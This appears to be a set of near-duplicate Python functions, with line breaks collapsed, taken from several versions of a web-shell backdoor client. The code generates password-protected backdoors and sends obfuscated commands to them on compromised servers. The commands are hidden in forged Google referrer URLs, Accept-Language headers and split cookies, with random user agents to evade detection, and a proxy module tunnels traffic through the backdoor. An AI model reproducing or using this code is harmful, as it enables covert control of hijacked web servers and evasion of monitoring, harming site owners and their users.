def send(self, original_payload): payload = base64.b64encode(original_payload.strip()) length = len(payload) third = length / 3 thirds = third * 2 referer = "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % ( self.password[:2], urllib2.quote(self.url), self.query.strip(), payload[:third], payload[third:thirds], payload[thirds:]) opener = urllib2.build_opener() opener.addheaders = [ ('User-Agent', random.choice(self.agents)), ('Referer', referer), ] + config.additional_headers dlog.debug('[R] %s' % (referer)) url = (self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url)) response = opener.open(url).read() if not response: return data = self.extractor.findall(response) if not data or len(data) < 1: return return data[0].strip()
def main(arguments): if arguments.command == 'generate': obfuscated = generate.generate(password=arguments.password, obfuscator=arguments.obfuscator, agent=arguments.agent) generate.save_generated(obfuscated, arguments.path) log.info( messages.generate.generated_backdoor_with_password_s_in_s_size_i % (arguments.password, arguments.path, len(obfuscated))) return elif arguments.command == 'terminal': session = SessionURL(url=arguments.url, password=arguments.password) elif arguments.command == 'session': session = SessionFile(arguments.path) dlog.debug(pprint.pformat(session)) modules.load_modules(session) if not arguments.cmd: Terminal(session).cmdloop() else: Terminal(session).onecmd(arguments.cmd)
def do_request(self): if self.command == 'CONNECT' or self.path.startswith('https'): log.warn(messages.module_net_proxy.https_not_implemented) self.requestline = '' self.request_version = '' self.command = '' self.send_error(501, messages.module_net_proxy.https_not_implemented) return net_curl_args = [self.path, '-X', self.command, '-i'] for h in self.headers: if h.title() in ('Keep-Alive', 'Proxy-Connection', 'Connection'): continue net_curl_args += ['-H', '%s: %s' % (h.title(), self.headers[h])] net_curl_args += ['-H', 'Proxy-Connection: close'] if self.command == 'POST': content_len = int(self.headers.getheader('content-length', 0)) net_curl_args += ['-d', self.rfile.read(content_len)] result, headers, saved = ModuleExec('net_curl', net_curl_args).run() dlog.debug('> ' + '\r\n> '.join( ['%s: %s' % (h.title(), self.headers[h]) for h in self.headers])) dlog.debug('< ' + '\r\n< '.join(headers)) self.wfile.write('\r\n'.join(headers)) self.wfile.write('\r\n\r\n') self.wfile.write(result)
def send(self, original_payload): payload = base64.b64encode(original_payload.strip()) length = len(payload) third = length / 3 thirds = third * 2 prefixes = self.default_prefixes[:] cookie_string = ( prefixes.pop() + '=' + self.password[:2] + '; ' ) while len(prefixes) > 3: if random.random() > 0.5: break cookie_string += ( prefixes.pop() + '=' + utils.strings.randstr(16, False, string.letters + string.digits) + '; ' ) # DO NOT fuzz with %, _ (\w on regexp keep _) payload = utils.strings.pollute( data = payload, charset = '#&*-/?@~' ) cookie_string += prefixes.pop() + '=' + payload[:third] + '; ' cookie_string += prefixes.pop() + '=' + payload[third:thirds] + '; ' cookie_string += prefixes.pop() + '=' + payload[thirds:] opener = urllib2.build_opener() opener.addheaders = [ ('User-Agent', random.choice(self.agents)), ('Cookie', cookie_string), ] dlog.debug( '[C] %s' % (cookie_string) ) response = opener.open(self.url).read() if not response: return data = self.extractor.findall(response) if not data or len(data) < 1: return return data[0].strip()
def send(self, original_payload, additional_handlers = []): payload = base64.b64encode(original_payload.strip()) length = len(payload) third = length / 3 thirds = third * 2 referer = "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % ( self.password[:2], urllib2.quote(self.url), self.query.strip(), payload[:third], payload[ third:thirds], payload[thirds:] ) opener = urllib2.build_opener(*additional_handlers) # When core.conf contains additional cookies, carefully merge # the new cookies and UA and add all the other headers additional_headers = [] additional_ua = '' for h in self.additional_headers: if h[0].lower() == 'user-agent' and h[1]: additional_ua = h[1] elif h[0].lower() == 'referer' and h[1]: pass else: additional_headers.append(h) opener.addheaders = [ ('User-Agent', (additional_ua if additional_ua else random.choice(self.agents))), ('Referer', referer), ] + additional_headers dlog.debug( '[R] %s' % (referer) ) url = ( self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url) ) response = opener.open(url).read() if not response: return data = self.extractor.findall(response) if not data or len(data) < 1: return return data[0].strip()
def send(self, original_payload): payload = base64.b64encode(original_payload.strip()) length = len(payload) third = length / 3 thirds = third * 2 referer = "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % ( self.password[:2], urllib2.quote(self.url), self.query.strip(), payload[:third], payload[ third:thirds], payload[thirds:] ) opener = urllib2.build_opener() # When core.conf contains additional cookies, carefully merge # the new cookies and UA and add all the other headers additional_headers = [] additional_ua = '' for h in self.additional_headers: if h[0].lower() == 'user-agent' and h[1]: additional_ua = h[1] elif h[0].lower() == 'referer' and h[1]: pass else: additional_headers.append(h) opener.addheaders = [ ('User-Agent', (additional_ua if additional_ua else random.choice(self.agents))), ('Referer', referer), ] + additional_headers dlog.debug( '[R] %s' % (referer) ) url = ( self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url) ) response = opener.open(url).read() if not response: return data = self.extractor.findall(response) if not data or len(data) < 1: return return data[0].strip()
def send(self, original_payload, additional_handlers = []): obfuscated_payload = base64.b64encode( utils.strings.sxor( zlib.compress(original_payload), self.shared_key)).rstrip('=') wrapped_payload = PREPEND + self.header + obfuscated_payload + self.trailer + APPEND opener = urllib2.build_opener(*additional_handlers) additional_ua = '' for h in self.additional_headers: if h[0].lower() == 'user-agent' and h[1]: additional_ua = h[1] break opener.addheaders = [ ('User-Agent', (additional_ua if additional_ua else self.agent)) ] + self.additional_headers dlog.debug( '[R] %s...' % (wrapped_payload[0:32]) ) url = ( self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url) ) try: response = opener.open(url, data = wrapped_payload).read() except httplib.BadStatusLine as e: # TODO: add this check to the other channels log.warn('Connection closed unexpectedly, aborting command.') return if not response: return # Multiple debug string may have been printed, using findall matched_debug = self.re_debug.findall(response) if matched_debug: dlog.debug('\n'.join(matched_debug)) matched = self.re_response.search(response) if matched and matched.group(1): return zlib.decompress( utils.strings.sxor( base64.b64decode( matched.group(1)), self.shared_key))
def send(self, original_payload): # Generate session id and referrers session_id, referrers_data = self._prepare(original_payload) cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) for referrer_index, referrer_data in enumerate(referrers_data): accept_language_header = self._generate_header_accept_language( referrer_data[1], session_id) accept_header = self._generate_header_accept() opener.addheaders = [ ('Referer', referrer_data[0]), ('Accept-Language', accept_language_header), ('Accept', accept_header), ('User-Agent', random.choice(self.agents)) ] dlog.debug( '[v:%i/%i] %s %s %s' % (referrer_index, len(referrers_data), accept_language_header, referrer_data[0], referrer_data[1])) response = opener.open(self.url).read() if not response: continue # Multiple debug string may have been printed, using findall matched_debug = self.re_debug.findall(response) if matched_debug: dlog.debug('\n'.join(matched_debug)) matched = self.re_response.search(response) if matched and matched.group(1): return zlib.decompress( utilities.sxor( base64.b64decode( matched.group(1)), self.shared_key))
def send(self, original_payload): # Generate session id and referrers session_id, referrers_data = self._prepare(original_payload) cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) for referrer_index, referrer_data in enumerate(referrers_data): accept_language_header = self._generate_header_accept_language( referrer_data[1], session_id) accept_header = self._generate_header_accept() opener.addheaders = [('Referer', referrer_data[0]), ('Accept-Language', accept_language_header), ('Accept', accept_header), ('User-Agent', random.choice(self.agents)) ] + config.additional_headers dlog.debug( '[v:%i/%i] %s %s %s' % (referrer_index, len(referrers_data), accept_language_header, referrer_data[0], referrer_data[1])) url = (self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url)) response = opener.open(url).read() if not response: continue # Multiple debug string may have been printed, using findall matched_debug = self.re_debug.findall(response) if matched_debug: dlog.debug('\n'.join(matched_debug)) matched = self.re_response.search(response) if matched and matched.group(1): return zlib.decompress( utils.strings.sxor(base64.b64decode(matched.group(1)), self.shared_key))
def do_request(self): if self.command == 'CONNECT' or self.path.startswith('https'): log.warn(messages.module_net_proxy.https_not_implemented) self.requestline = '' self.request_version = '' self.command = '' self.send_error( 501, messages.module_net_proxy.https_not_implemented ) return net_curl_args = [ self.path, '-X', self.command, '-i' ] for h in self.headers: if h.title() in ('Keep-Alive', 'Proxy-Connection', 'Connection'): continue net_curl_args += [ '-H', '%s: %s' % ( h.title(), self.headers[h] ) ] net_curl_args += [ '-H', 'Proxy-Connection: close' ] if self.command == 'POST': content_len = int(self.headers.getheader('content-length', 0)) net_curl_args += [ '-d', self.rfile.read(content_len) ] result, headers, saved = ModuleExec( 'net_curl', net_curl_args ).run() dlog.debug('> ' + '\r\n> '.join([ '%s: %s' % (h.title(), self.headers[h]) for h in self.headers ])) dlog.debug('< ' + '\r\n< '.join(headers)) self.wfile.write('\r\n'.join(headers)) self.wfile.write('\r\n\r\n') self.wfile.write(result)
def main(arguments): if arguments.command == 'generate': obfuscated = generate.generate( password = arguments.password, obfuscator = arguments.obfuscator, agent = arguments.agent ) generate.save_generated(obfuscated, arguments.path) log.info( messages.generate.generated_backdoor_with_password_s_in_s_size_i % (arguments.path, arguments.password, len(obfuscated)) ) return elif arguments.command == 'terminal': session = SessionURL( url = arguments.url, password = arguments.password ) elif arguments.command == 'session': session = SessionFile(arguments.path) dlog.debug( pprint.pformat(session) ) modules.load_modules(session) if not arguments.cmd: Terminal(session).cmdloop() else: Terminal(session).onecmd(arguments.cmd)
def send(self, original_payload): payload = base64.b64encode(original_payload.strip()) length = len(payload) third = length / 3 thirds = third * 2 referer = "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % ( self.password[:2], urllib2.quote(self.url), self.query.strip(), payload[:third], payload[ third:thirds], payload[thirds:] ) opener = urllib2.build_opener() opener.addheaders = [ ('User-Agent', random.choice(self.agents)), ('Referer', referer), ] dlog.debug( '[R] %s' % (referer) ) response = opener.open(self.url).read() if not response: return data = self.extractor.findall(response) if not data or len(data) < 1: return return data[0].strip()
def send(self, original_payload): # Generate session id and referrers session_id, referrers_data = self._prepare(original_payload) cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) # When core.conf contains additional cookies, carefully merge # the new headers killing the needed ones additional_headers = [] additional_ua = "" additional_cookie = "" for h in self.additional_headers: if h[0].lower() == "user-agent" and h[1]: additional_ua = h[1] if h[0].lower() == "cookie" and h[1]: cookies = h[1].rstrip(";").split("; ") for cookie in cookies: name, value = cookie.split("=") cj.set_cookie( cookielib.Cookie( version=0, name=name, value=value, port=None, port_specified=False, domain="", domain_specified=True, domain_initial_dot=True, path="/", path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={"HttpOnly": None}, ) ) elif h[0].lower() in ("accept", "accept-language", "referer"): # Skip sensible headers pass else: additional_headers.append(h) for referrer_index, referrer_data in enumerate(referrers_data): accept_language_header = self._generate_header_accept_language(referrer_data[1], session_id) accept_header = self._generate_header_accept() opener.addheaders = [ ("Referer", referrer_data[0]), ("Accept-Language", accept_language_header), ("Accept", accept_header), ("User-Agent", (additional_ua if additional_ua else random.choice(self.agents))), ] + additional_headers dlog.debug( "[H %i/%i]\n%s\n[C] %s" % ( referrer_index, len(referrers_data) - 1, "\n".join("> %s: %s" % (h[0], h[1]) for h in opener.addheaders), cj, ) ) url = self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url) response = opener.open(url).read() if not response: continue # Multiple debug string may have been printed, using findall matched_debug = self.re_debug.findall(response) if matched_debug: dlog.debug("\n".join(matched_debug)) matched = self.re_response.search(response) if matched and matched.group(1): return zlib.decompress(utils.strings.sxor(base64.b64decode(matched.group(1)), self.shared_key))
def _prepare(self, payload): obfuscated_payload = base64.urlsafe_b64encode( utils.strings.sxor(zlib.compress(payload), self.shared_key) ).rstrip("=") # Generate a randomic seession_id that does not conflicts with the # payload chars for i in range(30): session_id = "".join(random.choice(string.ascii_lowercase) for x in range(2)) # Generate 3-character urlsafe_b64encode header and footer # checkable on server side header = hashlib.md5(session_id + self.shared_key[:4]).hexdigest().lower()[:3] footer = hashlib.md5(session_id + self.shared_key[4:8]).hexdigest().lower()[:3] if ( not header in obfuscated_payload and not footer in obfuscated_payload and not (obfuscated_payload + footer).find(footer) != len(obfuscated_payload) ): break elif i == 30: raise ChannelException(core.messages.stegareferrer.error_generating_id) remaining_payload = header + obfuscated_payload + footer dlog.debug("DATA TO SEND: " + remaining_payload) dlog.debug("HEADER: %s, FOOTER %s" % (header, footer)) referrers = [] # Randomize the order random.shuffle(self.referrers_vanilla) for referrer_index, referrer_vanilla_data in enumerate(itertools.cycle(self.referrers_vanilla)): # Separate the chunks sizes from the referrers referrer_vanilla, chunks_sizes_vanilla = referrer_vanilla_data # Clone chunk size to avoid .pop(0) consuming chunks_sizes = chunks_sizes_vanilla[:] # Separate the query from the rest referrer, query = referrer_vanilla.split("?", 1) # Apply template on the referrer host referrer = referrer.replace("http://${ url }", self.url) referrer += "?" positions = [] # Loop the parameters parameters = urlparse.parse_qsl(query) for parameter_index, content in enumerate(parameters): param, value = content # Prepend & to parameters if parameter_index > 0: referrer += "&" # Add the templatized parameters if not value == "${ chunk }": referrer += "%s=%s" % (param, value) else: # Since the parameters over the ninth can't be indexed, this # Cause an error. if parameter_index > 9: raise ChannelException( core.messages.stegareferrer.error_chunk_position_i_s % (parameter_index, referrer_vanilla) ) # Pick a proper payload size min_size, max_size = chunks_sizes.pop(0) if not remaining_payload: # If not payload, stuff padding payload_size = 0 padding_size = random.randint(min_size, max_size) elif len(remaining_payload) <= min_size: # Not enough payload, stuff latest payload + padding payload_size = len(remaining_payload) padding_size = min_size - payload_size elif min_size < len(remaining_payload) <= max_size: # Enough payload to fill properly the parameter, stuff # payload payload_size = len(remaining_payload) padding_size = 0 else: # Overflowing payload, cut remaining payload to the max payload_size = max_size padding_size = 0 # Add crafted parameter referrer += "%s=%s%s" % ( param, remaining_payload[:payload_size], utils.strings.randstr(padding_size), ) # If some payload was inserted, add position and cut # remaining payload if payload_size: positions.append(parameter_index) remaining_payload = remaining_payload[payload_size:] referrers.append((referrer, positions)) if not remaining_payload: break return session_id, referrers
def _prepare(self, payload): obfuscated_payload = base64.urlsafe_b64encode( utilities.sxor(zlib.compress(payload), self.shared_key)).rstrip('=') # Generate a randomic seession_id that does not conflicts with the # payload chars for i in range(30): session_id = ''.join( random.choice(string.ascii_lowercase) for x in range(2)) # Generate 3-character urlsafe_b64encode header and footer # checkable on server side header = hashlib.md5(session_id + self.shared_key[:4]).hexdigest().lower()[:3] footer = hashlib.md5(session_id + self.shared_key[4:8]).hexdigest().lower()[:3] if (not header in obfuscated_payload and not footer in obfuscated_payload and not (obfuscated_payload + footer).find(footer) != len(obfuscated_payload)): break elif i == 30: raise ChannelException( core.messages.stegareferrer.error_generating_id) remaining_payload = header + obfuscated_payload + footer dlog.debug('DATA TO SEND: ' + remaining_payload) dlog.debug('HEADER: %s, FOOTER %s' % (header, footer)) referrers = [] # Randomize the order random.shuffle(self.referrers_vanilla) for referrer_index, referrer_vanilla_data in enumerate( itertools.cycle(self.referrers_vanilla)): # Separate the chunks sizes from the referrers referrer_vanilla, chunks_sizes_vanilla = referrer_vanilla_data # Clone chunk size to avoid .pop(0) consuming chunks_sizes = chunks_sizes_vanilla[:] # Separate the query from the rest referrer, query = referrer_vanilla.split('?', 1) referrer += '?' positions = [] # Loop the parameters parameters = urlparse.parse_qsl(query) for parameter_index, content in enumerate(parameters): param, value = content # Prepend & to parameters if parameter_index > 0: referrer += '&' # Add the templatized parameters if not value == '${ chunk }': referrer += '%s=%s' % (param, value) else: # Since the parameters over the ninth can't be indexed, this # Cause an error. if parameter_index > 9: raise ChannelException( core.messages.stegareferrer. error_chunk_position_i_s % (parameter_index, referrer_vanilla)) # Pick a proper payload size min_size, max_size = chunks_sizes.pop(0) if not remaining_payload: # If not payload, stuff padding payload_size = 0 padding_size = random.randint(min_size, max_size) elif len(remaining_payload) <= min_size: # Not enough payload, stuff latest payload + padding payload_size = len(remaining_payload) padding_size = min_size - payload_size elif min_size < len(remaining_payload) <= max_size: # Enough payload to fill properly the parameter, stuff # payload payload_size = len(remaining_payload) padding_size = 0 else: # Overflowing payload, cut remaining payload to the max payload_size = max_size padding_size = 0 # Add crafted parameter referrer += '%s=%s%s' % (param, remaining_payload[:payload_size], utilities.randstr(padding_size)) # If some payload was inserted, add position and cut # remaining payload if payload_size: positions.append(parameter_index) remaining_payload = remaining_payload[payload_size:] referrers.append((referrer, positions)) if not remaining_payload: break return session_id, referrers
def send(self, original_payload, additional_handlers = []): # Generate session id and referrers session_id, referrers_data = self._prepare(original_payload) cj = cookielib.CookieJar() additional_handlers.append(urllib2.HTTPCookieProcessor(cj)) opener = urllib2.build_opener(*additional_handlers) # When core.conf contains additional cookies, carefully merge # the new headers killing the needed ones additional_headers = [] additional_ua = '' additional_cookie = '' for h in self.additional_headers: if h[0].lower() == 'user-agent' and h[1]: additional_ua = h[1] if h[0].lower() == 'cookie' and h[1]: cookies = h[1].rstrip(';').split('; ') for cookie in cookies: name, value = cookie.split('=') cj.set_cookie( cookielib.Cookie( version=0, name=name, value=value, port=None, port_specified=False, domain='', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={'HttpOnly': None} ) ) elif h[0].lower() in ('accept', 'accept-language', 'referer'): # Skip sensible headers pass else: additional_headers.append(h) for referrer_index, referrer_data in enumerate(referrers_data): accept_language_header = self._generate_header_accept_language( referrer_data[1], session_id) accept_header = self._generate_header_accept() opener.addheaders = [ ('Referer', referrer_data[0]), ('Accept-Language', accept_language_header), ('Accept', accept_header), ('User-Agent', ( additional_ua if additional_ua else random.choice(self.agents) ) ) ] + additional_headers dlog.debug( '[H %i/%i]\n%s\n[C] %s' % ( referrer_index, len(referrers_data) - 1, '\n'.join('> %s: %s' % (h[0], h[1]) for h in opener.addheaders), cj ) ) url = ( self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url) ) try: response = opener.open(url).read() except httplib.BadStatusLine as e: # TODO: add this check to the other channels log.warn('Connection closed unexpectedly, aborting command.') return if not response: continue # Multiple debug string may have been printed, using findall matched_debug = self.re_debug.findall(response) if matched_debug: dlog.debug('\n'.join(matched_debug)) matched = self.re_response.search(response) if matched and matched.group(1): return zlib.decompress( utils.strings.sxor( base64.b64decode( matched.group(1)), self.shared_key))
def send(self, original_payload, additional_handlers=[]): # Generate session id and referrers session_id, referrers_data = self._prepare(original_payload) cj = cookielib.CookieJar() additional_handlers.append(urllib2.HTTPCookieProcessor(cj)) opener = urllib2.build_opener(*additional_handlers) # When core.conf contains additional cookies, carefully merge # the new headers killing the needed ones additional_headers = [] additional_ua = '' additional_cookie = '' for h in self.additional_headers: if h[0].lower() == 'user-agent' and h[1]: additional_ua = h[1] if h[0].lower() == 'cookie' and h[1]: cookies = h[1].rstrip(';').split('; ') for cookie in cookies: name, value = cookie.split('=') cj.set_cookie( cookielib.Cookie(version=0, name=name, value=value, port=None, port_specified=False, domain='', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={'HttpOnly': None})) elif h[0].lower() in ('accept', 'accept-language', 'referer'): # Skip sensible headers pass else: additional_headers.append(h) for referrer_index, referrer_data in enumerate(referrers_data): accept_language_header = self._generate_header_accept_language( referrer_data[1], session_id) accept_header = self._generate_header_accept() opener.addheaders = [ ('Referer', referrer_data[0]), ('Accept-Language', accept_language_header), ('Accept', accept_header), ('User-Agent', (additional_ua if additional_ua else random.choice(self.agents))) ] + additional_headers dlog.debug('[H %i/%i]\n%s\n[C] %s' % (referrer_index, len(referrers_data) - 1, '\n'.join( '> %s: %s' % (h[0], h[1]) for h in opener.addheaders), cj)) url = (self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url)) try: response = opener.open(url).read() except httplib.BadStatusLine as e: # TODO: add this check to the other channels log.warn('Connection closed unexpectedly, aborting command.') return if not response: continue # Multiple debug string may have been printed, using findall matched_debug = self.re_debug.findall(response) if matched_debug: dlog.debug('\n'.join(matched_debug)) matched = self.re_response.search(response) if matched and matched.group(1): return zlib.decompress( utils.strings.sxor(base64.b64decode(matched.group(1)), self.shared_key))
def send(self, original_payload, additional_handlers = []): payload = base64.b64encode(original_payload.strip()) length = len(payload) third = length / 3 thirds = third * 2 prefixes = self.default_prefixes[:] cookie_payload_string = '' # Add random cookies before payload while len(prefixes) > 3 and len(prefixes) > 4: if random.random() > 0.5: break cookie_payload_string += ( prefixes.pop() + '=' + utils.strings.randstr(16, False, string.letters + string.digits) + '; ' ) # DO NOT fuzz with %, _ (\w on regexp keep _) payload = utils.strings.pollute( data = payload, charset = '#&*-/?@~' ) cookie_payload_string += prefixes.pop() + '=' + payload[:third] + '; ' cookie_payload_string += prefixes.pop() + '=' + payload[third:thirds] + '; ' cookie_payload_string += prefixes.pop() + '=' + payload[thirds:] opener = urllib2.build_opener(*additional_handlers) # When core.conf contains additional cookies, carefully merge # the new cookies and UA and add all the other headers additional_headers = [] additional_ua = '' additional_cookie = '' for h in self.additional_headers: if h[0].lower() == 'cookie' and h[1]: additional_cookie = ' %s;' % h[1].strip(';') elif h[0].lower() == 'user-agent' and h[1]: additional_ua = h[1] else: additional_headers.append(h) additional_headers.append( ('User-Agent', (additional_ua if additional_ua else random.choice(self.agents)) ) ) # If user cookies are specified, insert them between the first # (the trigger) and the lastest three (the splitted payload) additional_headers.append( ('Cookie', '%s=%s;%s %s' % ( prefixes.pop(), self.password[:2], additional_cookie if additional_cookie else '', cookie_payload_string ) ) ) opener.addheaders = additional_headers dlog.debug( '[H]\n%s' % ('\n'.join('> %s: %s' % (h[0], h[1]) for h in additional_headers)) ) url = ( self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url) ) response = opener.open(url).read() if not response: return data = self.extractor.findall(response) if not data or len(data) < 1: return return data[0].strip()
def send(self, original_payload): payload = base64.b64encode(original_payload.strip()) length = len(payload) third = length / 3 thirds = third * 2 prefixes = self.default_prefixes[:] cookie_payload_string = '' # Add random cookies before payload while len(prefixes) > 3 and len(prefixes) > 4: if random.random() > 0.5: break cookie_payload_string += ( prefixes.pop() + '=' + utils.strings.randstr(16, False, string.letters + string.digits) + '; ' ) # DO NOT fuzz with %, _ (\w on regexp keep _) payload = utils.strings.pollute( data = payload, charset = '#&*-/?@~' ) cookie_payload_string += prefixes.pop() + '=' + payload[:third] + '; ' cookie_payload_string += prefixes.pop() + '=' + payload[third:thirds] + '; ' cookie_payload_string += prefixes.pop() + '=' + payload[thirds:] opener = urllib2.build_opener() # When core.conf contains additional cookies, carefully merge # the new cookies and UA and add all the other headers additional_headers = [] additional_ua = '' additional_cookie = '' for h in self.additional_headers: if h[0].lower() == 'cookie' and h[1]: additional_cookie = ' %s;' % h[1].strip(';') elif h[0].lower() == 'user-agent' and h[1]: additional_ua = h[1] else: additional_headers.append(h) additional_headers.append( ('User-Agent', (additional_ua if additional_ua else random.choice(self.agents)) ) ) # If user cookies are specified, insert them between the first # (the trigger) and the lastest three (the splitted payload) additional_headers.append( ('Cookie', '%s=%s;%s %s' % ( prefixes.pop(), self.password[:2], additional_cookie if additional_cookie else '', cookie_payload_string ) ) ) opener.addheaders = additional_headers dlog.debug( '[H]\n%s' % ('\n'.join('> %s: %s' % (h[0], h[1]) for h in additional_headers)) ) url = ( self.url if not config.add_random_param_nocache else utils.http.add_random_url_param(self.url) ) response = opener.open(url).read() if not response: return data = self.extractor.findall(response) if not data or len(data) < 1: return return data[0].strip()